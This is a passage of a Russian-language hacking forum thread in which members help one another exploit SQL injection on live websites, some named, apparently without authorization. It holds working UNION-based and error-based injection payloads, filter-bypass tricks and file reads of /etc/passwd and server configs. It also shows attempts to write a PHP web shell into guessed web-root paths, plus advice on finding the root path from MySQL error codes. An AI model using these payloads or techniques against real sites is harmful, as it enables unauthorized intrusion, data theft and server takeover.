Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    75
    Likes Received:
    8
    Reputations:
    1
    Имеется уязвимость на site.com , вида site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10-- '
    Колонки на вывод - 1 и 6.
    Вывести через них database(), user() не получается, т.к. в ответ получаю пустое место.
    Зато можно вывести версию :) @@version , version() - 5.0.95-log
    При других запросах на вывод таблиц и т.д. - либо пустое место, вместо результата (как с user() ), либо ошибку Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in

    Есть ли какие-нибудь идеи, как узнать пользователя и текущую базу данных из приведённых мною выше данных? :)
     
  2. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Aniweste, фильтр? Попробуйте определить, на что. Или length(database()) = 0?
    Code:
    [I]site.com/x.php?id=-1' union+select+US[/I][I]ER,2,3,4,5,DB,7,8,9,10+from+info[/I][I]rmation_schema.PROCESS[/I][I]LIST+WHERE+info+rlik[/I]e[I]+0x50524f43--+[/I]
    
    В information_schema есть почти вся инфа, см. SHOW TABLES FROM information_schema и SELECT * FROM table LIMIT 5 на локалхосте.
     
    #23282 randman, 31 May 2014
    Last edited: 31 May 2014
  3. int

    int Member

    Joined:
    18 May 2011
    Messages:
    81
    Likes Received:
    10
    Reputations:
    6
    Как раскрутить такое:
    Code:
    SELECT * FROM table WHERE ... ORDER by table.field LIMIT $limitstart, $limit
    
    где $limitstart, $limit - не фильтруются.
     
  4. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Для инъекции в LIMIT после ORDER BY сейчас нет векторов атак (возможно и не будет).
     
    1 person likes this.
  5. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    75
    Likes Received:
    8
    Reputations:
    1
    Всё равно ошибка Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in.
    Нечаянно, пока дописывал, проверил
    site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+fro-- - нет ошибки, site.com/x.php?id=-1' union+select+1,2,3,4,5,6,7,8,9,10+from-- - есть ошибка. Но думаю, что это бред :mad:
     
  6. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Aniweste, всё нормально.

    fro воспринимается как псевдоним для колонки, запрос корректен.
    В случае с from в запрос из-за фильтра поступает муть и вы видите ошибку.
     
  7. [dword]

    [dword] Elder - Старейшина

    Joined:
    11 Apr 2007
    Messages:
    113
    Likes Received:
    74
    Reputations:
    40
    Помогите разобраться, там Joomla.

    http://k apper-sng.ru/insiderskaya-informaciya?start=4
    пытаюсь раскрутить переменную start, но видимо мало еще понимаю механизм.
    при запросе start=-4
    пытаюсь подобрать столбцы, но не получается, не пропадает ошибка.
    при start=99999 выдаётся пустая страница, без содержания. Вроде и есть инъекция (на сколько моих знаний хватает), но не могу понять, как использовать.
    Покажите правильную дорогу пожалуйста. Благодарю заранее.
     
  8. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Здесь нечего крутить, к лимиту допускаются только целые числа, здесь в любом случае нет даже вариантов к раскрутке.
     
    1 person likes this.
  9. sav77

    sav77 Member

    Joined:
    20 Oct 2010
    Messages:
    54
    Likes Received:
    12
    Reputations:
    0
    Помогите, как начинаю раскручивать - перекидывает на localhost...
     
  10. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    А что вы там крутите то ? Тут так-же, как с предыдущим сайтом.
    Там есть более доступные варианты:
    Code:
    http://cyberfight.ru/site/polls/?topic_id=430&answer_id=(select max(0)from information_schema.schemata group by concat(0x427920496E6F6D7321,0x3b,user(),hex(rand(0))))
     
    1 person likes this.
  11. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    75
    Likes Received:
    8
    Reputations:
    1
    Вопрос, наверное, тупой и т.д., но всё-таки:
    При выводе через SQL-injection данных из information_schema.schemata schema_name мы получим базы данных к которым имеет доступ данный пользователь? Или вообще ко всем базам данных?
    Соответственно, если ответом на мой вопрос является - ко всем базам данных, к которым имеет доступ пользователь, то у меня второй вопрос:
    Если среди этих баз есть mysql, то можно ли узнать file_priv через mysql.user (спрашиваю, т.к. в моём случае выбивает ошибку)? :) Т.е. через information_schema.schemata schema_name получили данные из base1, information_shema и mysql , но прочитать можем только первые 2. Вот :)
     
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,773
    Likes Received:
    789
    Reputations:
    843
    Если в information_schema фигурирует mysql, но чтение с неё не производит - доступ к данной бд урезан для текущего пользователя, попросту говоря, запрещён.

    Соответственно, чтобы прочитать колонки с этой БД, тебе нужны права на выборку (селекцию). Если прав нет - чтение произвести ты не сможешь.
     
    _________________________
  13. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Aniweste, Все права можно посмотреть в information_schema.TABLE_PRIVILEGES, information_schema.COLUMN_PRIVILEGES, information_schema.SCHEMA_PRIVILEGES и information_schema.USER_PRIVILEGES.
     
  14. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    75
    Likes Received:
    8
    Reputations:
    1
    BigBear, XAMEHA - спасибо за ответы :)
     
    1 person likes this.
  15. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    75
    Likes Received:
    8
    Reputations:
    1
    Ещё один вопрос.
    Сайт - site.com
    File_priv - Y
    Вывод /etc/passwd под пользователя user() web - /home/web
    Вывод /etc/httpd/conf/httpd.conf - DocumentRoot "/var/www/html"
    Проверка заливки <?php system($_REQUEST[c]); ?> в '/tmp/test.txt' и вывод через load_file('tmp/test.txt')- 1,2,3,4,5,6,7,8,9,10,12
    Пытался заливать в:
    Code:
    /home/www/data/www/1.txt
    /home/www/data/1.txt
    /home/www/data/www/site.com/1.txt
    /home/www/data/www/site/1.txt
    /home/www/1.txt
    /home/www/sites/site.com/htdocs/1.txt
    /home/www/sites/sitecom/htdocs/1.txt
    /home/www/sites/site/htdocs/1.txt
    /home/www/sites/site.com/httpdocs/1.txt
    /home/www/sites/sitecom/httpdocs/1.txt
    /home/www/sites/site/httpdocs/1.txt
    /home/www/sites/sitecom/httdocs/1.txt
    /home/www/site/site.com/htdocs/1.txt
    /home/www/site/sitecom/htdocs/1.txt
    /home/www/site/site/htdocs/1.txt
    /home/www/site/site.com/httpdocs/1.txt
    /home/www/site/sitecom/httpdocs/1.txt
    /home/www/site/site/httpdocs/1.txt
    /home/www/site/sitecom/httdocs/1.txt
    /home/web/data/www/1.txt/1.txt
    /home/web/data/1.txt
    /home/web/data/www/site.com/1.txt
    /home/web/data/www/site/1.txt
    /home/web/1.txt
    /home/web/sites/site.com/htdocs/1.txt
    /home/web/sites/sitecom/htdocs/1.txt
    /home/web/sites/site/htdocs/1.txt
    /home/web/sites/site.com/httpdocs/1.txt
    /home/web/sites/sitecom/httpdocs/1.txt
    /home/web/sites/site/httpdocs/1.txt
    /home/web/sites/sitecom/httdocs/1.txt
    /home/web/site/site.com/htdocs/1.txt
    /home/web/site/sitecom/htdocs/1.txt
    /home/web/site/site/htdocs/1.txt
    /home/web/site/site.com/httpdocs/1.txt
    /home/web/site/sitecom/httpdocs/1.txt
    /home/web/site/site/httpdocs/1.txt
    /home/web/site/sitecom/httdocs/1.txt
    /var/www/html/1.txt
    /var/www/web/1.txt
    /var/www/html/web/1.txt
    /var/www/html/site.com/1.txt
    /var/www/html/sitecom/1.txt
    /var/www/html/site/1.txt
    /var/www/html/web/site.com/1.txt
    /var/www/html/web/sitecom/1.txt
    /var/www/html/web/site/1.txt
    /var/www/web/data/www/site/1.txt
    /var/www/web/data/www/site.com/1.txt
    /var/www/web/data/www/sitecom/1.txt
    
    На результате это никак не сказалось. По сайту site.com/1.txt - 404 not found
    Пытался также перезаписать robots.txt - 404 not found
    И т.к. вывода с путём сайта я не нашёл ни так (при неверном запросе /var/wwwwwww/1.txt нету Errcode), не через google (искал вывод ошибки с этого сайта с раскрытием путей), а также пробовал через все вышеперечисленные варианты прочесть корневой robots.txt (через load_file), но как итог - нет результата. у меня 2 вопроса:

    1. Возможно ли, что запись в корень не возможна и соответственно невозможно чтение из корня или же я просто не попал на правильные пути?
    2. Второй вопрос вытекает из всего вышеперечисленного! Как ещё можно узнать полный путь до корня? :)

    P.s. вопрос с админкой отпадает - она переименована и её найти не смог. Как и директорию с phpmyadmin.
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,773
    Likes Received:
    789
    Reputations:
    843
    Просто интересно, нахрена, если

    Но ты обязательно продолжай и держи нас в курсе событий !! Есть ещё много интересных директорий !

    Ответы:
    1) Возможно. Правильный путь проверяется load_file любого существующего файла.
    2) Напоролся не на тот конфиг Apache, вариант - старый конфиг.
     
    _________________________
    #23296 BigBear, 4 Jun 2014
    Last edited: 4 Jun 2014
    1 person likes this.
  17. madhatter

    madhatter Member

    Joined:
    7 Aug 2013
    Messages:
    578
    Likes Received:
    47
    Reputations:
    54
    Полный путь до корня можно узнать из конфига. Это не обязательно /etc/httpd/conf/httpd.conf. Этот конфиг как правило правят руками, на всяких шаредах разведен бардак в подключаемых конфигах. Аналогично, это зависит от демона. А также phpinfo и любой вывод ошибок. Скиньте вашу ссылочку в пм, поищем админку.
     
  18. Aniweste

    Aniweste Member

    Joined:
    28 May 2010
    Messages:
    75
    Likes Received:
    8
    Reputations:
    1
    Я не дописал :mad: Тоже тестил:
    Code:
    /var/www/html/1.txt
    /var/www/html/site/1.txt
    /var/www/html/sitecom/1.txt
    /var/www/html/site.com/1.txt
    /var/www/html/web/site/1.txt
    /var/www/html/web/sitecom/1.txt
    /var/www/html/web/site.com/1.txt
    /var/www/html/web/1.txt
    
    И также пробовал подгружать существующий в корне robots :mad: Результат такой же. Странно, что сразу не дописал :(
    И нашёл php.ini в корне :(
     
    #23298 Aniweste, 4 Jun 2014
    Last edited: 4 Jun 2014
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,658
    Likes Received:
    174
    Reputations:
    75
    а код ошибки при записи какой? мб путь нашол правильно а прав в папке нет
     
  20. randman

    randman Members of Antichat

    Joined:
    15 May 2010
    Messages:
    1,372
    Likes Received:
    604
    Reputations:
    1,101
    Один и тот же:
    PHP:
    ERROR 1 (HY000): Can't create/write to file '/root/a' (Errcode: 13)
    Чтобы узнать правильность пути, пишите в каталог. Когда он существует, выводится такая ошибка:
    PHP:
    ERROR 1086 (HY000): File '/root' already exists
    Этот метод сработает, если двигаться от корня к конечной директории.
     
Loading...
Thread Status:
Not open for further replies.